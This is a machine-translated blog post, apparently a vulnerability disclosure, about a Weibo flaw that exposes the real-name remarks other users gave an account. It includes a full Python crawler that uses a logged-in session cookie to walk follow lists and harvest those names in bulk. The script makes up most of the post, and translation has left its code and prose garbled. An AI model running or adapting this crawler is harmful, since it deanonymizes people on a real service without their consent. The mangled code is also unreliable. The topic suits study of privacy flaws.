How to obtain the real name of Weibo without the knowledge of others (batch retrieval is supported)

Source: Internet
Author: User

How to obtain the real name of Weibo without the knowledge of others (batch retrieval is supported)

In fact, I also mentioned this problem on Weibo, but I was told that the willful product manager thought it was a business feature. Is it really capricious, is the real name of my weibo account leaked? I did not submit it myself !!! You just need to collect my information without my consent. You still show that you are so capricious and not afraid to beat me.

It is accidental to find this problem. When paying attention to others, when certain conditions are met (I think such conditions are shared by a certain amount and do not need to be followed by each other, this is not a certain amount .) It will automatically display the remarks given by others to the person who is being attacked (most of the time it is the real name)
 



(Because flashsky's name is public information, he demonstrated it)

Later, I found that I do not need to pay attention to others, as long as others follow me, I can also see
 




In fact, not all of them are real names, but after crawling, we found that the probability of crawling out a real name is very high.

Here is the program

#! /Usr/bin/env python # coding: utf-8import urllib, urllib2import re, sysimport cookielibimport json ''' 1. entry 2. step 3. use the oid of the first layer to construct the second layer of common concern url4. crawl the second layer ''' # global variable ## crawled path oidlist = set () spiderlist = set () global countcount = 0 headers = {} headers = {'cooker': add your Cookie here. Add your cookie here. 'user-agent': 'mozilla/5.0 (Macintosh; intel Mac OS X 10.10; rv: 34.0) Gecko/20100101 Firefox/34.0 ', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 ', 'Accept-color': 'zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3 ', 'dnt': 1, 'content-type': 'application/x-www-form-urlencoded; charset = UTF-8 ', 'X-Requested-with': 'xmlhttprequest ', 'Referer ':' http://weibo.com/m4njusaka?from=feed&loc=at&nick=%E8%82%89%E8%82%89%E8%A6%81%E5%A5%BD%E5%A5%BD%E5%86%99%E4%BB%A3%E7%A0%81&noscale_head=1 '} Def get_name (content): try: name = [] name = re. findall ('config \ [\ 'onick \' \] = \'(.*?) \ '', Content) return name [0] failed t Exception, e: passdef get_oid (content): try: oid = [] oid = re. findall ('config \ [\ 'oid \ '\] = \'(. *?) \ '', Content) return oid [0] failed t Exception, e: passdef get_real_name (user): real_name = [] user ['name'] = urllib. quote (user ['name']) postdata = urllib. urlencode ({'uid': user ['id'], 'objectid': '', 'F': 1, 'extra ':'', 'refer _ sort ': '', 'refer _ flag':'', 'location': 'page _ 100505_home ', 'id': user ['id'], 'wforce': 1, 'nogroup': 'false', 'fnick ': user ['name'],' _ t': 0,}) url =" http://weibo.com/aj/f/followed?ajwvr=6&__rnd=1419910508362 "Req = urllib2.Request (url = url, data = postdata, headers = headers) result = urllib2.urlopen (req ). read () real_name = re. findall ('"remark ":"(. *?) "', Result) if real_name: return real_name [0] def get_urllist (url): cj = cookielib. LWPCookieJar () opener = urllib2.build _ opener (cj) urllib2.install _ opener (opener) req = urllib2.Request (url, headers = headers) response = response (req) content = response. read () url_list = re. findall (r'action-data =\\ "uid = (. *?) & Fnick = (.*?) &.*? \\\ "> Private message ', content) return url_listdef get_page_sum (url): ''' the number of pages of common users returned ''' req = urllib2.Request (url, headers = headers) response = urllib2.urlopen (req) content = response. read () page = re. findall (r 'page S_txt1 ', content) page_sum = len (page) return page_sumdef spider (depth, startURL): I = 0 if depth <= 0: return 0 else: url_list = get_urllist (startURL) if len (url_list)> 0: for url in url_list: spider_url =" http://www.weibo.com/p/100505%s/follow?relate=same_follow "% Url [0] sum_page = get_page_sum (spider_url) for page in range (1, sum_page): spider_url =" http://www.weibo.com/p/100505%s/follow?relate=same_follow & Page = % s "% (url [0], page) target_url =" http://weibo.com/u/%s "% Url [0] if url [0] in oidlist: continue else: spider (depth-1, spider_url) get_user (url [0]) oidlist. add (url [0]) def get_user (oid): url =" http://weibo.com/u/%s "% Oid req = urllib2.Request (url, headers = headers) response = urllib2.urlopen (req) content = response. read () user = {'name': get_name (content), 'id': get_oid (content), 'real _ name ': ''} user ['real _ name'] = get_real_name (user) print user ['id'], urllib. unquote (user ['name']), json. loads ('{"test": "% s"}' % user ['real _ name']) ['test'] def main (): max_depth = 3 ''' start crawling address ''' startURL =' http://weibo.com/p/1005053191954357/follow?from=page_100505_profile&wvr=6&mod=modulerel 'Spider (max_depth, startURL) main ()

 

Solution:

Strengthen restrictions

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.